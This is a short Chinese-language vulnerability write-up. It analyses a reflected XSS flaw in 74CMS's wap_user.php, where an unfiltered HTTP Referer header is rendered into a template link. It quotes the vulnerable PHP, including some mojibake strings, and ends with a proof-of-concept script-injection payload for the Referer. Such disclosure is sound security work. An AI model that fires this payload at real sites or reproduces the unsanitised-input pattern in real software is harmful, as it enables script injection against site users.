74CMS wap_user.php XSS 漏洞
文件 /74cms/wap/wap_user.php:
45 elseif ($act == 'add_favorites')
46 {
47 require_once(QISHI_ROOT_PATH.'include/fun_personal.php');
48 $id=isset($_GET['id'])?trim($_GET['id']):exit("³ö´íÁË");
49 $link[0]['text'] = "[·µ»ØÉÏÒ»Ò³]";
50 $link[0]['href'] = $_SERVER["HTTP_REFERER"];
51 $link[1]['text'] = "[²é¿´ÊղؼÐ]";
52 $link[1]['href'] = 'wap_user.php?act=favorites';
53 if(add_favorites($id,$_SESSION['uid'])==0)
54 {
55 WapShowMsg("Ìí¼Óʧ°Ü£¬ÊղؼÐÖÐÒѾ´æÔÚ´Ëְλ",0,$link);
56 }
57 else
58 {
59 WapShowMsg("Ìí¼Ó³É¹¦",2,$link);
60 }
61 }
乱码就不解释了。第 50 行 Referer 没过滤,55 行调用了 WapShowMsg。WapShowMsg 函数的实现:
function WapShowMsg($msg_detail, $msg_type = 0, $links = array())
{
global $smarty;
if (count($links) == 0)
{
$links[0]['text'] = '·µ»ØÉÏÒ»Ò³';
$links[0]['href'] = 'javascript:history.go(-1)';
}
$smarty->assign('ur_here', 'ϵͳÌáʾ');
$smarty->assign('msg_type', $msg_type);
$smarty->assign('msg_detail', $msg_detail);
$smarty->assign('links', $links);
$smarty->assign('default_url', $links[0]['href']);
$smarty->display('wap/wap-showmsg.htm');
exit();
}
没过滤就给模板渲染了,Referer 里可直接插入 JS 来触发漏洞:
"><script>alert(1)</script>